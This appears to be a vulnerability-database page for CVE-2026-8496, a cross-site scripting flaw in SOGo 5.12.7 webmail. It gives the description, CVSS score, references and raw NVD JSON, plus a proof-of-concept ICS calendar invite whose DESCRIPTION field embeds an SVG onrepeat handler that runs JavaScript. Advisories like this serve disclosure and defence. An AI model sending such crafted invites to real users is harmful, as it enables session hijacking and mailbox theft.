CVE-2026-8496

Description

A cross-site scripting (XSS) vulnerability exists in Alinto SOGo, version 5.12.7. A maliciously crafted ICS calendar invitation files allows arbitrary JavaScript execution within the authenticated SOGo webmail session. The issue occurs because SVG content embedded in the description field of an ICS file, with an onrepeat event handler, is insufficiently sanitized before being rendered in the webmail interface. A remote attacker can execute JavaScript in the victim's browser when the malicious calendar invite is viewed. Successful exploitation may allow mailbox access, email and contact theft, session hijacking, and other actions allowed by an authenticated user.

CVSS Details

CVSS Score

6.1

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Alinto SOGo 5.12.7

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

BEGIN:VCALENDAR VERSION:2.0 PRODID:-//PoC Generator//XSS//EN BEGIN:VEVENT UID:[email protected] DTSTAMP:20260513T191731Z DTSTART:20260513T200000Z DTEND:20260513T210000Z SUMMARY:Meeting Invite DESCRIPTION:<svg xmlns="http://www.w3.org/2000/svg"><set attributeName="onrepeat" to="alert('XSS')"/></svg> END:VEVENT END:VCALENDAR

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-8496
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-8496
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-8496/
[4] VulDB https://vuldb.com/cve/CVE-2026-8496
[5] https://github.com/Alinto/sogo/commit/67ce01ec2a1a7854d8e9f615dd65afb949043e86
[6] https://github.com/Alinto/sogo/releases/tag/SOGo-5.12.8
[7] https://www.sogo.nu/news/2026/sogo-v5128-released.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-8496", "sourceIdentifier": "[email protected]", "published": "2026-05-13T19:17:30.700", "lastModified": "2026-05-13T19:17:30.700", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "A cross-site scripting (XSS) vulnerability exists in Alinto SOGo, version 5.12.7. A maliciously crafted ICS calendar invitation files allows arbitrary JavaScript execution within the authenticated SOGo webmail session. The issue occurs because SVG content embedded in the description field of an ICS file, with an onrepeat event handler, is insufficiently sanitized before being rendered in the webmail interface. A remote attacker can execute JavaScript in the victim's browser when the malicious calendar invite is viewed. Successful exploitation may allow mailbox access, email and contact theft, session hijacking, and other actions allowed by an authenticated user."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "references": [{"url": "https://github.com/Alinto/sogo/commit/67ce01ec2a1a7854d8e9f615dd65afb949043e86", "source": "[email protected]"}, {"url": "https://github.com/Alinto/sogo/releases/tag/SOGo-5.12.8", "source": "[email protected]"}, {"url": "https://www.sogo.nu/news/2026/sogo-v5128-released.html", "source": "[email protected]"}]}}